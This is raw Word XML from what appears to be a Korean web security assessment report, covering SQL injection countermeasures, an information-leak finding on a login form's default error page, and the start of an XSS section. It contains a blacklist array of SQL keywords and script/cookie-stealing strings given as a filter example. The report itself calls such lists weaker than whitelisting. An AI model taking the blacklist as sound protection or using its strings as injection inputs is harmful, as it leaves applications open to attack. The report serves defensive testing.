        <w:pStyle w:val="ac"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="516" w:name="_Toc48909184"/>
      <w:r w:rsidRPr="00A24C89">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>[그림</w:t>
      </w:r>
      <w:r w:rsidR="0060126B">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 4</w:t>
      </w:r>
      <w:r w:rsidRPr="00A24C89">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidRPr="00A24C89">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00A24C89">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ [그림_3- \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00A24C89">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="000411AE">
        <w:rPr>
          <w:b w:val="0"/>
          <w:noProof/>
        </w:rPr>
        <w:t>32</w:t>
      </w:r>
      <w:r w:rsidRPr="00A24C89">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00A24C89">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">] </w:t>
      </w:r>
      <w:r w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>SQL 오류 메시지 반환</w:t>
      </w:r>
      <w:bookmarkEnd w:id="516"/>
    </w:p>
    <w:p w:rsidR="00A10BAC" w:rsidRPr="00C97C1E" w:rsidRDefault="00A10BAC" w:rsidP="00A10BAC">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A10BAC" w:rsidRPr="00C97C1E" w:rsidRDefault="00A10BAC" w:rsidP="00A10BAC">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A10BAC" w:rsidRPr="00C97C1E" w:rsidRDefault="00A10BAC" w:rsidP="00A10BAC">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A10BAC" w:rsidRPr="00C97C1E" w:rsidRDefault="00A10BAC" w:rsidP="00B004BB">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="517" w:name="_Toc48909089"/>
      <w:r w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>보안대책</w:t>
      </w:r>
      <w:bookmarkEnd w:id="517"/>
    </w:p>
    <w:p w:rsidR="00A10BAC" w:rsidRPr="00A24C89" w:rsidRDefault="00A10BAC" w:rsidP="00A10BAC">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:ind w:leftChars="425" w:left="850"/>
      </w:pPr>
      <w:r w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">소스코드에 </w:t>
      </w:r>
      <w:r w:rsidRPr="00A24C89">
        <w:t xml:space="preserve">SQL Query </w:t>
      </w:r>
      <w:r w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>입력</w:t>
      </w:r>
      <w:r w:rsidR="00D847D2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>값을 받는 함수나 코드를 써야 할 경우,</w:t>
      </w:r>
      <w:r w:rsidRPr="00A24C89">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">임의의 </w:t>
      </w:r>
      <w:r w:rsidRPr="00A24C89">
        <w:t xml:space="preserve">SQL Query </w:t>
      </w:r>
      <w:r w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">입력에 대한 검증 로직을 구현해야 함(있는 </w:t>
      </w:r>
      <w:r w:rsidRPr="00A24C89">
        <w:t>‘, “, -</w:t>
      </w:r>
      <w:r w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>와 같은 문자의</w:t>
      </w:r>
      <w:r w:rsidRPr="00A24C89">
        <w:t xml:space="preserve"> 필터링을 권고</w:t>
      </w:r>
      <w:r w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A10BAC" w:rsidRPr="00A24C89" w:rsidRDefault="00A10BAC" w:rsidP="00A10BAC">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:ind w:leftChars="425" w:left="850"/>
      </w:pPr>
      <w:r w:rsidRPr="00A24C89">
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">검증되지 않는 </w:t>
      </w:r>
      <w:r w:rsidRPr="00A24C89">
        <w:t>SQL Query</w:t>
      </w:r>
      <w:r w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>가 인수값으로 사용될 경우 에러 페이지가 아닌,</w:t>
      </w:r>
      <w:r w:rsidRPr="00A24C89">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>정상 페이지가 반환되도록 필처링 처리를 해야</w:t>
      </w:r>
      <w:r w:rsidR="00D847D2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>함</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A10BAC" w:rsidRPr="00A24C89" w:rsidRDefault="00A10BAC" w:rsidP="00A10BAC">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:ind w:leftChars="425" w:left="850"/>
      </w:pPr>
      <w:r w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">- 웹 방화벽을 운용할 경우 웹 방화벽에 </w:t>
      </w:r>
      <w:r w:rsidRPr="00A24C89">
        <w:t xml:space="preserve">SQL </w:t>
      </w:r>
      <w:r w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">인젝션 관련 룰 셋을 적용하여 </w:t>
      </w:r>
      <w:r w:rsidRPr="00A24C89">
        <w:t xml:space="preserve">SQL </w:t>
      </w:r>
      <w:r w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>인젝션 공격을 차단함</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A10BAC" w:rsidRPr="00A24C89" w:rsidRDefault="00A10BAC" w:rsidP="00A10BAC">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:ind w:leftChars="425" w:left="850"/>
      </w:pPr>
      <w:r w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">- 또한 아래코드 형태의 </w:t>
      </w:r>
      <w:r w:rsidRPr="00A24C89">
        <w:t xml:space="preserve">BlackList </w:t>
      </w:r>
      <w:r w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">필터링 기법이 아닌 허용된 문자만 입력 받는 </w:t>
      </w:r>
      <w:r w:rsidRPr="00A24C89">
        <w:t>WhiteList</w:t>
      </w:r>
      <w:r w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>방식으로 필터링 될 것을 권고합니다.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7655"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A10BAC" w:rsidRPr="00C97C1E" w:rsidTr="00FA3A45">
        <w:trPr>
          <w:trHeight w:val="4820"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7655" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00A10BAC" w:rsidRPr="00C97C1E" w:rsidRDefault="00A10BAC" w:rsidP="00FA3A45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rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidRPr="00C97C1E">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve"> BlackList = Array("--", ";", "/*", "*/", "@@", "@",_</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00A10BAC" w:rsidRPr="00C97C1E" w:rsidRDefault="00A10BAC" w:rsidP="00FA3A45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char", "nchar", "varchar", "nvarchar",_</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00A10BAC" w:rsidRPr="00C97C1E" w:rsidRDefault="00A10BAC" w:rsidP="00FA3A45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alter", "begin", "cast", "create", "cursor",_</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00A10BAC" w:rsidRPr="00C97C1E" w:rsidRDefault="00A10BAC" w:rsidP="00FA3A45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declare", "delete", "drop", "end", "exec",_</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00A10BAC" w:rsidRPr="00C97C1E" w:rsidRDefault="00A10BAC" w:rsidP="00FA3A45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execute", "fetch", "insert", "kill", "open",_</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00A10BAC" w:rsidRPr="00C97C1E" w:rsidRDefault="00A10BAC" w:rsidP="00FA3A45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select", "sys", "sysobjects", "syscolumns",_</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00A10BAC" w:rsidRPr="00C97C1E" w:rsidRDefault="00A10BAC" w:rsidP="00FA3A45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 xml:space="preserve">                  "table", "update","'", "and", "cast", "substring",_</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00A10BAC" w:rsidRPr="00C97C1E" w:rsidRDefault="00A10BAC" w:rsidP="00FA3A45">
            <w:pPr>
              <w:widowControl/>
              <w:wordWrap/>
              <w:autoSpaceDE/>
              <w:autoSpaceDN/>
              <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
              <w:ind w:leftChars="425" w:left="850"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C97C1E">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">                  "&lt;script&gt;", "&lt;/script&gt;","document.cookie") ]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="008C4C3D" w:rsidRDefault="008C4C3D" w:rsidP="00FA3A45"/>
    <w:p w:rsidR="00FA3A45" w:rsidRPr="00FA3A45" w:rsidRDefault="008C4C3D" w:rsidP="00FA3A45">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA3A45" w:rsidRPr="00C97C1E" w:rsidRDefault="00FA3A45" w:rsidP="00B004BB">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="518" w:name="_Toc48909090"/>
      <w:r w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>정보누출</w:t>
      </w:r>
      <w:bookmarkEnd w:id="518"/>
    </w:p>
    <w:p w:rsidR="00FA3A45" w:rsidRPr="00C97C1E" w:rsidRDefault="00FA3A45" w:rsidP="00B004BB">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="519" w:name="_Toc48909091"/>
      <w:r w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>취약점 정의</w:t>
      </w:r>
      <w:bookmarkEnd w:id="519"/>
    </w:p>
    <w:p w:rsidR="00FA3A45" w:rsidRPr="00922158" w:rsidRDefault="00FA3A45" w:rsidP="00FA3A45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Pr="00922158">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>웹</w:t>
      </w:r>
      <w:r w:rsidRPr="00922158">
        <w:t xml:space="preserve"> 어플리케이션의 민감한 정보가 개발자의 부주의로 인해 노출되는 것으로 중요 정보(관리자 계정 및 테스트 계정 등)를 주석구문에 포함시켜 의도하지 않게 정보가 노출되는 취약점</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA3A45" w:rsidRPr="00922158" w:rsidRDefault="00FA3A45" w:rsidP="00FA3A45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t>- 디폴트로 설정된 에러 페이지를 그대로 사용할 경우 시스템 내부 문제점을 자세하게 출력해주기 때문에 절대경로, 상태코드, 데이터베이스 종류, 질의</w:t>
      </w:r>
      <w:r w:rsidRPr="00922158">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00922158">
        <w:t xml:space="preserve">문 등이 노출될 수 있으며 이 밖에도 공격자가 검색엔진을 통하여 각종 개인 정보 및 서버 정보 등 해킹에 필요한 정보를 획득할 수 </w:t>
      </w:r>
      <w:r w:rsidRPr="00922158">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>있음</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA3A45" w:rsidRPr="00C97C1E" w:rsidRDefault="00FA3A45" w:rsidP="00B004BB">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="520" w:name="_Toc48909092"/>
      <w:r w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>상세분석</w:t>
      </w:r>
      <w:bookmarkEnd w:id="520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FA3A45" w:rsidRPr="00C97C1E" w:rsidTr="00FA3A45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A3A45" w:rsidRPr="00922158" w:rsidRDefault="00FA3A45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취약한</w:t>
            </w:r>
            <w:r w:rsidRPr="00922158">
              <w:t xml:space="preserve"> 매소드/경로</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5781" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00FA3A45" w:rsidRPr="00922158" w:rsidRDefault="00FA3A45" w:rsidP="00FA3A45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t xml:space="preserve">* </w:t>
            </w:r>
            <w:r w:rsidR="008C4C3D" w:rsidRPr="008C4C3D">
              <w:t>jsp/login_form.jsp</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA3A45" w:rsidRPr="00C97C1E" w:rsidTr="00FA3A45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A3A45" w:rsidRPr="00922158" w:rsidRDefault="00FA3A45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FA3A45" w:rsidRPr="00922158" w:rsidRDefault="00FA3A45" w:rsidP="008C4C3D">
            <w:pPr>
              <w:widowControl/>
              <w:wordWrap/>
              <w:autoSpaceDE/>
              <w:autoSpaceDN/>
            </w:pPr>
            <w:r w:rsidRPr="00922158">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">- </w:t>
            </w:r>
            <w:r w:rsidR="008C4C3D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>필수 입력 값이 없이 요청을 하면 에러 페이지를 응답함</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00FA3A45" w:rsidRPr="00C97C1E" w:rsidRDefault="00FA3A45" w:rsidP="00FA3A45">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pP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8C4C3D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>필수 입력 값이 없이 회원 등록 요청함</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA3A45" w:rsidRPr="00C97C1E" w:rsidRDefault="008C4C3D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217420</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1905000" cy="247650"/>
                <wp:effectExtent l="0" t="0" r="19050" b="19050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D1816" id="직사각형 84" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:141.75pt;margin-top:174.6pt;width:150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" filled="f" strokecolor="red" strokeweight="2pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00FA3A45" w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:b/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0803F4D2" wp14:editId="1AD3C5CD">
            <wp:extent cx="4859542" cy="3060000"/>
            <wp:effectExtent l="19050" t="19050" r="17780" b="2667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13411" r="31196" b="37078"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4860128" cy="306036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45" w:rsidRDefault="00FA3A45" w:rsidP="00FA3A45">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="521" w:name="_Toc48909185"/>
      <w:r w:rsidRPr="00922158">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>[그림</w:t>
      </w:r>
      <w:r w:rsidR="0060126B">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 4</w:t>
      </w:r>
      <w:r w:rsidRPr="00922158">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">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33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60126B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>필수 입력 값을 비움</w:t>
      </w:r>
      <w:bookmarkEnd w:id="521"/>
    </w:p>
    <w:p w:rsidR="0060126B" w:rsidRDefault="0060126B" w:rsidP="0060126B"/>
    <w:p w:rsidR="0060126B" w:rsidRDefault="0060126B" w:rsidP="0060126B"/>
    <w:p w:rsidR="0060126B" w:rsidRPr="00C97C1E" w:rsidRDefault="0060126B" w:rsidP="0060126B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>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>웹 서버의 정보를 누출함</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0060126B" w:rsidRPr="00C97C1E" w:rsidRDefault="0060126B" w:rsidP="0060126B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2F3C545F" wp14:editId="387D8406">
            <wp:extent cx="4859655" cy="3060000"/>
            <wp:effectExtent l="19050" t="19050" r="17145" b="2667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8" r="34902" b="28685"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4860521" cy="306054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26B" w:rsidRPr="00922158" w:rsidRDefault="0060126B" w:rsidP="0060126B">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="522" w:name="_Toc48909186"/>
      <w:r w:rsidRPr="00922158">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>[그림</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 4</w:t>
      </w:r>
      <w:r w:rsidRPr="00922158">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">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34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>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>정보 누출</w:t>
      </w:r>
      <w:bookmarkEnd w:id="522"/>
    </w:p>
    <w:p w:rsidR="0060126B" w:rsidRPr="0060126B" w:rsidRDefault="0060126B" w:rsidP="0060126B"/>
    <w:p w:rsidR="00FA3A45" w:rsidRPr="00C97C1E" w:rsidRDefault="00FA3A45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b"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6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a"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="523" w:name="_Toc48909093"/>
      <w:r w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>보안대책</w:t>
      </w:r>
      <w:bookmarkEnd w:id="523"/>
    </w:p>
    <w:p w:rsidR="00FA3A45" w:rsidRPr="00922158" w:rsidRDefault="00FA3A45" w:rsidP="00FA3A45">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:ind w:leftChars="425" w:left="850"/>
      </w:pPr>
      <w:r w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="00922158">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>웹</w:t>
      </w:r>
      <w:r w:rsidRPr="00922158">
        <w:t xml:space="preserve"> 어플리케이션 :</w:t>
      </w:r>
      <w:r w:rsidRPr="00922158">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 모든</w:t>
      </w:r>
      <w:r w:rsidRPr="00922158">
        <w:t xml:space="preserve"> 웹 페이지에 대해 개발단계에서 디버깅 및 테스트를 목적으로 작성한</w:t>
      </w:r>
      <w:r w:rsidRPr="00922158">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 주석구문에</w:t>
      </w:r>
      <w:r w:rsidRPr="00922158">
        <w:t xml:space="preserve"> 서버 주요 정보가 포함되어 있을 경우 공격자가 해당 정보를</w:t>
      </w:r>
      <w:r w:rsidRPr="00922158">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 다른</w:t>
      </w:r>
      <w:r w:rsidRPr="00922158">
        <w:t xml:space="preserve"> 취약점과 연계해 사용할 수 있으므로 제거 </w:t>
      </w:r>
      <w:r w:rsidRPr="00922158">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>권고함</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA3A45" w:rsidRPr="00922158" w:rsidRDefault="00FA3A45" w:rsidP="00FA3A45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</w:t>
      </w:r>
      <w:r w:rsidRPr="00922158">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00922158">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>웹</w:t>
      </w:r>
      <w:r w:rsidRPr="00922158">
        <w:t xml:space="preserve"> 서버 보안 설정 : </w:t>
      </w:r>
      <w:r w:rsidRPr="00922158">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">공통의 에러 페이지를 </w:t>
      </w:r>
      <w:r w:rsidRPr="00922158">
        <w:t>웹 서버</w:t>
      </w:r>
      <w:r w:rsidRPr="00922158">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>에서</w:t>
      </w:r>
      <w:r w:rsidRPr="00922158">
        <w:t xml:space="preserve"> 보안 설정</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA3A45" w:rsidRPr="00922158" w:rsidRDefault="00FA3A45" w:rsidP="00FA3A45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민감한 주요 정보를 마스킹 처리함</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA3A45" w:rsidRPr="00922158" w:rsidRDefault="00FA3A45" w:rsidP="00FA3A45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주요한 정보는 서버에서 처리하며, 꼭 필요한 정보가 아니라면 클라이언트에게 응답을 하지 않게 시큐어 코딩을 하여 웹</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00922158">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>서버 구축함</w:t>
      </w:r>
      <w:r w:rsidRPr="00922158">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0060126B" w:rsidRDefault="0060126B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FA3A45" w:rsidRDefault="00FA3A45" w:rsidP="00FA3A45"/>
    <w:p w:rsidR="0060126B" w:rsidRPr="00C97C1E" w:rsidRDefault="0060126B" w:rsidP="00B004BB">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="524" w:name="_Toc48909094"/>
      <w:r w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>크로스 사이트 스크립팅(</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Cross-site scripting)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="524"/>
    </w:p>
    <w:p w:rsidR="0060126B" w:rsidRPr="00C97C1E" w:rsidRDefault="0060126B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60126B" w:rsidRPr="00C97C1E" w:rsidRDefault="0060126B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60126B" w:rsidRPr="00C97C1E" w:rsidRDefault="0060126B" w:rsidP="00B004BB">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:b/>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
    </w:p>
